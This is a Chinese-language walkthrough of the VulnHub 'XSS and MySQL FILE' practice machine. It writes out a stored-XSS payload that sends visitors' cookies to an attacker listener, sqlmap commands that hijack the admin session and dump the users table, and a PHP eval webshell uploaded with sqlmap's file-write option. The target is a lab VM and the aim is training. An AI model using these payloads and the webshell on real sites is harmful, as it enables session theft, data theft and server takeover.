XSS_and_Mysql_file靶场攻略

下载地址

https://download.vulnhub.com/pentesterlab/xss_and_mysql_file.iso

扫描ip

复制代码
arp-scan -l 

扫描端口

复制代码
nmap -sS -sV -p- 192.168.89.137

扫描目录

复制代码
dirsearch -u 192.168.89.137

访问80端口,点击测试

测试漏洞位置

复制代码
<script>alert(1)</script>

设置存储型xss,kali监听

复制代码
<script>document.write('<img src="http://192.168.89.137:8080/?' + document.cookie +'"/>');</script>
复制代码
python -m http.server 8080

一分钟左右会有cookie回显

登录admin

点击admin,随便输入账号密码抓包

修改cookie为kali监听到的,放行后可登录

点击edit,使用sqlmap注入

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --dbs --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' --tables --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' -T 'users' --dump --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

得到账号密码

蚁剑shell

在kali创建一个php文件

复制代码
vim 1.php

<?php @eval($_POST['123456']);?>

使用sqlmap将文件放到网站

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4" --file-write /home/kali/1.php --file-dest /var/www/css/1.php

使用蚁剑连接

相关推荐
confiself31 分钟前
前端代码渲染截图方案
前端
xkxnq41 分钟前
第二阶段:Vue 组件化开发(第 21天)
前端·javascript·vue.js
阿珊和她的猫1 小时前
深入理解 React 中的 Render Props 模式
前端·react.js·状态模式
IT_陈寒1 小时前
SpringBoot 3.0实战:10个高效开发技巧让你的启动时间减少50%
前端·人工智能·后端
im_AMBER1 小时前
前端 + agent 开发学习路线
前端·学习·agent
亿坊电商2 小时前
利于SEO优化的CMS系统都有哪些特点?
前端·数据库
juejin_cn2 小时前
使用 Codex SDK 轻松实现文字控制电脑
前端
CUYG2 小时前
Moment.js常用
前端
用户81274828151202 小时前
漏学Input知识系列之“偷”走了其他窗口的事件pilferPointers
前端